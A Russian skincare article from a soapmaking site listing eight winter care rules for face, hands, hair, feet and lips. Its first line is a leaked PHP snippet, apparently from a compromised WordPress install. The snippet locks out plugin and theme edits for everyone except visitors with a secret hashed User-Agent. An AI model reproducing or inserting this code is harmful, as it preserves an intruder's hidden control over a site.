if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Необходимые сведенья о зимнем уходе за кожей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

8 правил для ухода за кожей зимой

Ветер, мороз и пересушенный воздух помещений способны повредить кожу лица. Но этого можно избежать, если начать готовить кожу к зиме заранее с помощью лечебной косметики, обильно увлажняя и питая ее витаминами

Кож­ные покро­вы чело­ве­ка боль­ше все­го под­вер­же­ны вли­я­нию погод­ных усло­вий имен­но зимой. Ветер, мороз и пере­су­шен­ный воз­дух поме­ще­ний спо­соб­ны повре­дить защит­ную обо­лоч­ку кожи. В первую оче­редь это каса­ет­ся лица, как само­го откры­то­го участ­ка на теле, кото­рый, в отли­чии от дру­гих, не спря­чешь под одеждой.

Рас­смот­рим подроб­нее воз­мож­ные послед­ствия зим­ней непо­го­ды для кожи:

  • Обез­во­жи­ва­ние кожи обу­слов­ле­но замед­ле­ни­ем рабо­ты саль­ных желез, а так­же тем, что холод­ный и сухой воз­дух «вытя­ги­ва­ет» вла­гу из кожи.
  • Шелу­ше­ние. По при­чине холо­да и скач­ков тем­пе­ра­ту­ры при пере­хо­де из отап­ли­ва­е­мо­го поме­ще­ния на ули­цу, рого­вой слой эпи­дер­ми­са ста­но­вит­ся тол­стым и буг­ри­стым, а гид­ро­ли­пид­ная плен­ка на его поверх­но­сти, наобо­рот, более тонкой.
  • Покрас­не­ние кож­но­го покро­ва про­ис­хо­дит под воз­дей­стви­ем мик­ро­ча­стиц льда, про­ни­ка­ю­щих сквозь повре­жден­ную защит­ную плен­ку эпидермиса.

Но эти про­бле­мы мож­но мини­ми­зи­ро­вать, если начать гото­вить кожу к зиме зара­нее с помо­щью лечеб­ной кос­ме­ти­ки, обиль­но увлаж­няя и питая ее вита­ми­на­ми, а так­же, соблю­дая ряд нехит­рых правил.

  1. domashnya_maska_dlya_volos_01В зим­ний пери­од не исполь­зо­вать для умы­ва­ния воду из-под кра­на и мыло. Доволь­но жест­кая водо­про­вод­ная вода содер­жит в себе мно­го каль­ция и маг­ния. Попа­дая на кожу, они созда­ют нерас­тво­ри­мую плен­ку. При этом жир­ная кожа может вос­па­лить­ся, а сухая кожа из-за это­го начи­на­ет шелу­шить­ся. Здесь боль­ше подой­дут такие сред­ства для ухо­да за кожей лица, как бес­спир­то­вые тони­ки и молочко.
  2. Для защи­ты кож­но­го покро­ва от холо­да перед выхо­дом на ули­цу нано­сить спе­ци­аль­ные зим­ние кре­ма, соот­вет­ству­ю­щие типу кожи. Глу­по посто­ян­но при­ме­нять к сухой коже сред­ство для жир­ной и рас­счи­ты­вать на какой-либо эффект, кро­ме вреда.
  3. Регу­ляр­но исполь­зо­вать спе­ци­аль­ную кос­ме­ти­ку в домаш­них усло­ви­ях, делать про­це­ду­ры пилин­га кожи с помо­щью скра­бов для свое­вре­мен­но­го очи­ще­ния от отсла­и­ва­ю­щих­ся чешу­ек рого­во­го слоя эпидермиса.
  4. Во вре­мя пилин­га вме­сте с чешуй­ка­ми сни­ма­ет­ся и поверх­ност­ный защит­ный жиро­вой слой кожи. Для его вос­ста­нов­ле­ния необ­хо­ди­мо делать пита­тель­ные мас­ки на осно­ве увлаж­ня­ю­ще­го крема.
  5. Кожа рук зимой уяз­ви­ма и нуж­да­ет­ся в еже­днев­ном исполь­зо­ва­нии защит­ных кре­мов фаб­рич­но­го про­из­вод­ства или нату­раль­ной кос­ме­ти­ки, сде­лан­ной сво­и­ми рука­ми. Поло­же­ние усу­губ­ля­ет­ся тем, что руки, в отли­чии от кож­но­го покро­ва лица, намно­го менее увлаж­не­ны. Это свя­за­но с мень­шим коли­че­ством саль­ных желез на руках и, соот­вет­ствен­но, более тон­кой гид­ро­ли­пид­ной плен­кой. Для быст­ро­го вос­ста­нов­ле­ния мож­но нане­сти на руки эмуль­сию из тра­вя­но­го экс­трак­та и про­те­и­нов , одев свер­ху хлоп­ча­то­бу­маж­ные пер­чат­ки, и оста­вить на ночь. Утром резуль­тат при­ят­но удивит.
  6. Уход за воло­са­ми зимой. Из-за посто­ян­но­го ноше­ния голов­ных убо­ров кожа голо­вы испы­ты­ва­ет так назы­ва­е­мый «пар­ни­ко­вый эффект» Зим­ний уход за воло­са­ми дол­жен быть осо­бен­но береж­ным и вклю­чать регу­ляр­ное мытье голо­вы с шам­пу­нем и нане­се­ние масок или баль­за­мов на кор­ни и кон­чи­ки волос.
  7. Защи­та кожи ног. Ван­ноч­ки для ног с насто­ем коры дуба или любым дру­гим тра­вя­ным анти­сеп­ти­ком еже­не­дель­но сле­ду­ет при­ме­нять тем, кто боль­шую часть дня ходит в теп­лой зим­ней обуви.
  8. Кожа на губах во вре­мя моро­за может потрес­кать­ся и обвет­рить­ся. Для созда­ния на губах защит­ной обо­лоч­ки сле­ду­ет нано­сить на них спе­ци­аль­ную гиги­е­ни­че­скую лечеб­ной кос­ме­ти­кой, напри­мер, гиги­е­ни­че­скую пома­ду, в состав кото­рой вхо­дят вита­ми­ны, нату­раль­ные мине­ра­лы и мик­ро элементы.

Кожа чело­ве­ка — очень проч­ный, но при этом уяз­ви­мый мате­ри­ал. Она посто­ян­но нуж­да­ет­ся в защи­те и ухо­де. В зим­ние меся­цы – осо­бен­но. Одна­ко, соблю­дая в пол­ном объ­е­ме про­стые пра­ви­ла, о ее состо­я­нии мож­но не беспокоиться.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!